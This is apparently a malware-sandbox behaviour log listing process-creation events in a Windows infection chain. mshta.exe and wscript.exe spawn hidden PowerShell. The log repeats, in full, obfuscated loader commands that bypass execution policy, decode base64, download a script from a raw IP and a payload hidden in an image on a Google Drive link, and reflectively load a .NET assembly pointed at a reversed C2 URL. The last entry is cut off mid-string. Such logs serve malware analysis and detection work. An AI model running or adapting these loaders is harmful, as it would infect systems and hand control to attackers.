Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYStEM32\windOWSpOWErsHeLL\V1.0\PoWERShelL.exe" "PoweRshElL.EXe -Ex ByPAss -noP -W 1 -C dEvIcECreDEnTIaldEpLOYMent.EXE ; IeX($(Iex('[SYSTem.texT.enCoDIng]'+[chAR]0X3a+[cHAR]58+'UTf8.gETsTRInG([sYSTEM.CONverT]'+[cHAr]0x3a+[Char]58+'fRoMBASe64STrIng('+[cHaR]34+'JFhETklVVk0yVTJQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFcmRlRmlOSVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0xBYWd3b3csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHUmosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGd3cCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdlcpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJiZUtsQXF0QWEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB1TlFCdkdFdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWEROSVVWTTJVMlA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjE0Ni40Ni81Ny9waWN0dXJld2l0aGdyZWF0bmV3c3dpdGhnb29kdGhpbmdzb25iZXN0cGxhY2UudElGIiwiJEVuVjpBUFBEQVRBXHBpY3R1cmV3aXRoZ3JlYXRuZXdzd2l0aGdvb2R0aGluZ3NvbmJlLnZicyIsMCwwKTtTVEFydC1zbGVlcCgzKTtTdGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdG5ld3N3aXRoZ29vZHRoaW5nc29uYmUudmJzIg=='+[chAr]34+'))')))"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBzSG9NRVsyMV0rJFBzaE9tRVszMF0rJ3gnKSgoJ1prYWltYWdlVXJsID0gUUN4aHQnKyd0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjYnKyd2UzRzVU95Ym5ILXNEdlVoQll3dXIgUUN4O1prYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3knKydzdGVtLk5ldC5XZWJDbGllbnQ7WmthaW1hZ2VCJysneXRlcyA9IFprYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoWmthaW1hZ2VVcmwpO1prYWltYWdlVGV4dCA9IFtTeXN0JysnZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFprYWltYWdlQnl0ZXMpO1prYXN0YXJ0RmxhZyA9IFFDeDwnKyc8QkFTRTY0X1NUQVJUPj5RQ3g7WmthZW5kRmxhZyA9IFFDeDw8QkFTRTY0X0VORD4+UUN4O1prYXN0YXJ0SW5kZXggPSBaa2FpbWFnZVRleHQuSW5kZXhPZihaa2FzdGFydEZsYWcpO1prYWVuZEluZGV4ID0gWmthaW1hZ2VUZXh0LkluZGV4T2YoWmthZW5kRmxhZycrJyk7Wmthc3RhcnRJbmRleCAtZ2UgMCAtYW4nKydkIFprYWVuZEluZGV4IC1ndCBaJysna2FzdCcrJ2FydEluZGV4O1prYXN0YXJ0SW4nKydkZXggKz0gWmthc3RhcnRGbGFnLkxlbmd0aDtaa2FiYXNlNjRMZW5ndGgnKycgPSBaa2FlbmRJbmRleCAtIFprYXN0YXJ0SW5kZXg7WmthYmFzZTY0Q29tbWFuZCA9IFprYWltYWdlVGV4dC5TdWJzdHJpbicrJ2coWmthc3RhcnRJbmRleCwgJysnWmthYmFzJysnZTY0TGVuZ3RoKTtaa2FiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChaa2FiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgS041IEZvckVhY2gtT2JqZWN0IHsgWmsnKydhXyB9KVstMS4uLShaa2FiJysnYXMnKydlNjRDb21tYW5kLkxlbmd0aCldO1prYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlJysnNjRTdHJpbmcoWmthYmFzZTY0UmV2ZXJzZWQpO1prYWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChaa2Fjb21tYScrJ25kQnl0ZXMpO1prYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoUUN4VkFJUUN4KTtaa2F2YWlNZXRob2QuSW52b2tlKFprYW51bGwsIEAoUUN4dHh0LlJSRlZHR0ZSLzc1LzY0LjY0MS40NzEuNzAxLy86cHR0aFFDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUMnKyd4ZGVzYXRpdmFkb1FDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUN4Q2FzJysnUG9sUUN4LCBRQ3hkZXNhdGl2YWRvUScrJ0N4LCBRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3gxUUN4LFFDeGRlc2F0aXZhZG9RQ3gpKTsnKS5yRVBMYUNlKChbY0hhUl05MCtbY0hhUl0xMDcrW2NIYVJdOTcpLFtzVHJJbmddW2NIYVJdMzYpLnJFUExhQ2UoJ0tONScsW3NUckluZ11bY0hhUl0xMjQpLnJFUExhQ2UoKFtjSGFSXTgxK1tjSGFSXTY3K1tjSGFSXTEyMCksW3NUckluZ11bY0hhUl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $psHoME[21]+$PshOmE[30]+'x')(('ZkaimageUrl = QCxht'+'tps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur QCx;ZkawebClient = New-Object Sy'+'stem.Net.WebClient;ZkaimageB'+'ytes = ZkawebClient.DownloadData(ZkaimageUrl);ZkaimageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(ZkaimageBytes);ZkastartFlag = QCx<'+'<BASE64_START>>QCx;ZkaendFlag = QCx<<BASE64_END>>QCx;ZkastartIndex = ZkaimageText.IndexOf(ZkastartFlag);ZkaendIndex = ZkaimageText.IndexOf(ZkaendFlag'+');ZkastartIndex -ge 0 -an'+'d ZkaendIndex -gt Z'+'kast'+'artIndex;ZkastartIn'+'dex += ZkastartFlag.Length;Zkabase64Length'+' = ZkaendIndex - ZkastartIndex;Zkabase64Command = ZkaimageText.Substrin'+'g(ZkastartIndex, '+'Zkabas'+'e64Length);Zkabase64Reversed = -join (Zkabase64Command.ToCharArray() KN5 ForEach-Object { Zk'+'a_ })[-1..-(Zkab'+'as'+'e64Command.Length)];ZkacommandBytes = [System.'+'Convert]::FromBase'+'64String(Zkabase64Reversed);ZkaloadedAssembly = [System.Reflection.Assembly]::Load(Zkacomma'+'ndBytes);ZkavaiMethod = [dnlib.IO.Home].Ge'+'tMethod(QCxVAIQCx);ZkavaiMethod.Invoke(Zkanull, @(QCxtxt.RRFVGGFR/75/64.641.471.701//:ptthQCx, QCxdesativadoQCx, QC'+'xdesativadoQCx, QCxdesativadoQCx, QCxCas'+'PolQCx, QCxdesativadoQ'+'Cx, QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCx1QCx,QCxdesativadoQCx));').rEPLaCe(([cHaR]90+[cHaR]107+[cHaR]97),[sTrIng][cHaR]36).rEPLaCe('KN5',[sTrIng][cHaR]124).rEPLaCe(([cHaR]81+[cHaR]67+[cHaR]120),[sTrIng][cHaR]39))"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYStEM32\windOWSpOWErsHeLL\V1.0\PoWERShelL.exe" "PoweRshElL.EXe -Ex ByPAss -noP -W 1 -C dEvIcECreDEnTIaldEpLOYMent.EXE ; IeX($(Iex('[SYSTem.texT.enCoDIng]'+[chAR]0X3a+[cHAR]58+'UTf8.gETsTRInG([sYSTEM.CONverT]'+[cHAr]0x3a+[Char]58+'fRoMBASe64STrIng('+[cHaR]34+'JFhETklVVk0yVTJQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFcmRlRmlOSVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0xBYWd3b3csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHUmosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGd3cCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdlcpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJiZUtsQXF0QWEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB1TlFCdkdFdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWEROSVVWTTJVMlA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjE0Ni40Ni81Ny9waWN0dXJld2l0aGdyZWF0bmV3c3dpdGhnb29kdGhpbmdzb25iZXN0cGxhY2UudElGIiwiJEVuVjpBUFBEQVRBXHBpY3R1cmV3aXRoZ3JlYXRuZXdzd2l0aGdvb2R0aGluZ3NvbmJlLnZicyIsMCwwKTtTVEFydC1zbGVlcCgzKTtTdGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdG5ld3N3aXRoZ29vZHRoaW5nc29uYmUudmJzIg=='+[chAr]34+'))')))"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBzSG9NRVsyMV0rJFBzaE9tRVszMF0rJ3gnKSgoJ1prYWltYWdlVXJsID0gUUN4aHQnKyd0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjYnKyd2UzRzVU95Ym5ILXNEdlVoQll3dXIgUUN4O1prYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3knKydzdGVtLk5ldC5XZWJDbGllbnQ7WmthaW1hZ2VCJysneXRlcyA9IFprYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoWmthaW1hZ2VVcmwpO1prYWltYWdlVGV4dCA9IFtTeXN0JysnZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFprYWltYWdlQnl0ZXMpO1prYXN0YXJ0RmxhZyA9IFFDeDwnKyc8QkFTRTY0X1NUQVJUPj5RQ3g7WmthZW5kRmxhZyA9IFFDeDw8QkFTRTY0X0VORD4+UUN4O1prYXN0YXJ0SW5kZXggPSBaa2FpbWFnZVRleHQuSW5kZXhPZihaa2FzdGFydEZsYWcpO1prYWVuZEluZGV4ID0gWmthaW1hZ2VUZXh0LkluZGV4T2YoWmthZW5kRmxhZycrJyk7Wmthc3RhcnRJbmRleCAtZ2UgMCAtYW4nKydkIFprYWVuZEluZGV4IC1ndCBaJysna2FzdCcrJ2FydEluZGV4O1prYXN0YXJ0SW4nKydkZXggKz0gWmthc3RhcnRGbGFnLkxlbmd0aDtaa2FiYXNlNjRMZW5ndGgnKycgPSBaa2FlbmRJbmRleCAtIFprYXN0YXJ0SW5kZXg7WmthYmFzZTY0Q29tbWFuZCA9IFprYWltYWdlVGV4dC5TdWJzdHJpbicrJ2coWmthc3RhcnRJbmRleCwgJysnWmthYmFzJysnZTY0TGVuZ3RoKTtaa2FiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChaa2FiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgS041IEZvckVhY2gtT2JqZWN0IHsgWmsnKydhXyB9KVstMS4uLShaa2FiJysnYXMnKydlNjRDb21tYW5kLkxlbmd0aCldO1prYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlJysnNjRTdHJpbmcoWmthYmFzZTY0UmV2ZXJzZWQpO1prYWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChaa2Fjb21tYScrJ25kQnl0ZXMpO1prYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoUUN4VkFJUUN4KTtaa2F2YWlNZXRob2QuSW52b2tlKFprYW51bGwsIEAoUUN4dHh0LlJSRlZHR0ZSLzc1LzY0LjY0MS40NzEuNzAxLy86cHR0aFFDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUMnKyd4ZGVzYXRpdmFkb1FDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUN4Q2FzJysnUG9sUUN4LCBRQ3hkZXNhdGl2YWRvUScrJ0N4LCBRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3gxUUN4LFFDeGRlc2F0aXZhZG9RQ3gpKTsnKS5yRVBMYUNlKChbY0hhUl05MCtbY0hhUl0xMDcrW2NIYVJdOTcpLFtzVHJJbmddW2NIYVJdMzYpLnJFUExhQ2UoJ0tONScsW3NUckluZ11bY0hhUl0xMjQpLnJFUExhQ2UoKFtjSGFSXTgxK1tjSGFSXTY3K1tjSGFSXTEyMCksW3NUckluZ11bY0hhUl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $psHoME[21]+$PshOmE[30]+'x')(('ZkaimageUrl = QCxht'+'tps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur QCx;ZkawebClient = New-Object Sy'+'stem.Net.WebClient;ZkaimageB'+'ytes = ZkawebClient.DownloadData(ZkaimageUrl);ZkaimageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(ZkaimageBytes);ZkastartFlag = QCx<'+'<BASE64_START>>QCx;ZkaendFlag = QCx<<BASE64_END>>QCx;ZkastartIndex = ZkaimageText.IndexOf(ZkastartFlag);ZkaendIndex = ZkaimageText.IndexOf(ZkaendFlag'+');ZkastartIndex -ge 0 -an'+'d ZkaendIndex -gt Z'+'kast'+'artIndex;ZkastartIn'+'dex += ZkastartFlag.Length;Zkabase64Length'+' = ZkaendIndex - ZkastartIndex;Zkabase64Command = ZkaimageText.Substrin'+'g(ZkastartIndex, '+'Zkabas'+'e64Length);Zkabase64Reversed = -join (Zkabase64Command.ToCharArray() KN5 ForEach-Object { Zk'+'a_ })[-1..-(Zkab'+'as'+'e64Command.Length)];ZkacommandBytes = [System.'+'Convert]::FromBase'+'64String(Zkabase64Reversed);ZkaloadedAssembly = [System.Reflection.Assembly]::Load(Zkacomma'+'ndBytes);ZkavaiMethod = [dnlib.IO.Home].Ge'+'tMethod(QCxVAIQCx);ZkavaiMethod.Invoke(Zkanull, @(QCxtxt.RRFVGGFR/75/64.641.471.701//:ptthQCx, QCxdesativadoQCx, QC'+'xdesativadoQCx, QCxdesativadoQCx, QCxCas'+'PolQCx, QCxdesativadoQ'+'Cx, QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCx1QCx,QCxdesativadoQCx));').rEPLaCe(([cHaR]90+[cHaR]107+[cHaR]97),[sTrIng][cHaR]36).rEPLaCe('KN5',[sTrIng][cHaR]124).rEPLaCe(([cHaR]81+[cHaR]67+[cHaR]120),[sTrIng][cHaR]39))"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYStEM32\windOWSpOWErsHeLL\V1.0\PoWERShelL.exe" "PoweRshElL.EXe -Ex ByPAss -noP -W 1 -C dEvIcECreDEnTIaldEpLOYMent.EXE ; IeX($(Iex('[SYSTem.texT.enCoDIng]'+[chAR]0X3a+[cHAR]58+'UTf8.gETsTRInG([sYSTEM.CONverT]'+[cHAr]0x3a+[Char]58+'fRoMBASe64STrIng('+[cHaR]34+'JFhETklVVk0yVTJQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFcmRlRmlOSVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0xBYWd3b3csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHUmosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGd3cCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdlcpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJiZUtsQXF0QWEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB1TlFCdkdFdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWEROSVVWTTJVMlA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjE0Ni40Ni81Ny9waWN0dXJld2l0aGdyZWF0bmV3c3dpdGhnb29kdGhpbmdzb25iZXN0cGxhY2UudElGIiwiJEVuVjpBUFBEQVRBXHBpY3R1cmV3aXRoZ3JlYXRuZXdzd2l0aGdvb2R0aGluZ3NvbmJlLnZicyIsMCwwKTtTVEFydC1zbGVlcCgzKTtTdGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdG5ld3N3aXRoZ29vZHRoaW5nc29uYmUudmJzIg=='+[chAr]34+'))')))"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBzSG9NRVsyMV0rJFBzaE9tRVszMF0rJ3gnKSgoJ1prYWltYWdlVXJsID0gUUN4aHQnKyd0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjYnKyd2UzRzVU95Ym5ILXNEdlVoQll3dXIgUUN4O1prYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3knKydzdGVtLk5ldC5XZWJDbGllbnQ7WmthaW1hZ2VCJysneXRlcyA9IFprYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoWmthaW1hZ2VVcmwpO1prYWltYWdlVGV4dCA9IFtTeXN0JysnZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFprYWltYWdlQnl0ZXMpO1prYXN0YXJ0RmxhZyA9IFFDeDwnKyc8QkFTRTY0X1NUQVJUPj5RQ3g7WmthZW5kRmxhZyA9IFFDeDw8QkFTRTY0X0VORD4+UUN4O1prYXN0YXJ0SW5kZXggPSBaa2FpbWFnZVRleHQuSW5kZXhPZihaa2FzdGFydEZsYWcpO1prYWVuZEluZGV4ID0gWmthaW1hZ2VUZXh0LkluZGV4T2YoWmthZW5kRmxhZycrJyk7Wmthc3RhcnRJbmRleCAtZ2UgMCAtYW4nKydkIFprYWVuZEluZGV4IC1ndCBaJysna2FzdCcrJ2FydEluZGV4O1prYXN0YXJ0SW4nKydkZXggKz0gWmthc3RhcnRGbGFnLkxlbmd0aDtaa2FiYXNlNjRMZW5ndGgnKycgPSBaa2FlbmRJbmRleCAtIFprYXN0YXJ0SW5kZXg7WmthYmFzZTY0Q29tbWFuZCA9IFprYWltYWdlVGV4dC5TdWJzdHJpbicrJ2coWmthc3RhcnRJbmRleCwgJysnWmthYmFzJysnZTY0TGVuZ3RoKTtaa2FiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChaa2FiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgS041IEZvckVhY2gtT2JqZWN0IHsgWmsnKydhXyB9KVstMS4uLShaa2FiJysnYXMnKydlNjRDb21tYW5kLkxlbmd0aCldO1prYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlJysnNjRTdHJpbmcoWmthYmFzZTY0UmV2ZXJzZWQpO1prYWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChaa2Fjb21tYScrJ25kQnl0ZXMpO1prYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoUUN4VkFJUUN4KTtaa2F2YWlNZXRob2QuSW52b2tlKFprYW51bGwsIEAoUUN4dHh0LlJSRlZHR0ZSLzc1LzY0LjY0MS40NzEuNzAxLy86cHR0aFFDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUMnKyd4ZGVzYXRpdmFkb1FDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUN4Q2FzJysnUG9sUUN4LCBRQ3hkZXNhdGl2YWRvUScrJ0N4LCBRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3gxUUN4LFFDeGRlc2F0aXZhZG9RQ3gpKTsnKS5yRVBMYUNlKChbY0hhUl05MCtbY0hhUl0xMDcrW2NIYVJdOTcpLFtzVHJJbmddW2NIYVJdMzYpLnJFUExhQ2UoJ0tONScsW3NUckluZ11bY0hhUl0xMjQpLnJFUExhQ2UoKFtjSGFSXTgxK1tjSGFSXTY3K1tjSGFSXTEyMCksW3NUckluZ11bY0hhUl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $psHoME[21]+$PshOmE[30]+'x')(('ZkaimageUrl = QCxht'+'tps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur QCx;ZkawebClient = New-Object Sy'+'stem.Net.WebClient;ZkaimageB'+'ytes = ZkawebClient.DownloadData(ZkaimageUrl);ZkaimageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(ZkaimageBytes);ZkastartFlag = QCx<'+'<BASE64_START>>QCx;ZkaendFlag = QCx<<BASE64_END>>QCx;ZkastartIndex = ZkaimageText.IndexOf(ZkastartFlag);ZkaendIndex = ZkaimageText.IndexOf(ZkaendFlag'+');ZkastartIndex -ge 0 -an'+'d ZkaendIndex -gt Z'+'kast'+'artIndex;ZkastartIn'+'dex += ZkastartFlag.Length;Zkabase64Length'+' = ZkaendIndex - ZkastartIndex;Zkabase64Command = ZkaimageText.Substrin'+'g(ZkastartIndex, '+'Zkabas'+'e64Length);Zkabase64Reversed = -join (Zkabase64Command.ToCharArray() KN5 ForEach-Object { Zk'+'a_ })[-1..-(Zkab'+'as'+'e64Command.Length)];ZkacommandBytes = [System.'+'Convert]::FromBase'+'64String(Zkabase64Reversed);ZkaloadedAssembly = [System.Reflection.Assembly]::Load(Zkacomma'+'ndBytes);ZkavaiMethod = [dnlib.IO.Home].Ge'+'tMethod(QCxVAIQCx);ZkavaiMethod.Invoke(Zkanull, @(QCxtxt.RRFVGGFR/75/64.641.471.701//:ptthQCx, QCxdesativadoQCx, QC'+'xdesativadoQCx, QCxdesativadoQCx, QCxCas'+'PolQCx, QCxdesativadoQ'+'Cx, QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCx1QCx,QCxdesativadoQCx));').rEPLaCe(([cHaR]90+[cHaR]107+[cHaR]97),[sTrIng][cHaR]36).rEPLaCe('KN5',[sTrIng][cHaR]124).rEPLaCe(([cHaR]81+[cHaR]67+[cHaR]120),[sTrIng][cHaR]39))"	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYStEM32\windOWSpOWErsHeLL\V1.0\PoWERShelL.exe" "PoweRshElL.EXe -Ex ByPAss -noP -W 1 -C dEvIcECreDEnTIaldEpLOYMent.EXE ; IeX($(Iex('[SYSTem.texT.enCoDIng]'+[chAR]0X3a+[cHAR]58+'UTf8.gETsTRInG([sYSTEM.CONverT]'+[cHAr]0x3a+[Char]58+'fRoMBASe64STrIng('+[cHaR]34+'JFhETklVVk0yVTJQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFcmRlRmlOSVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0xBYWd3b3csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbixzdHJpbmcg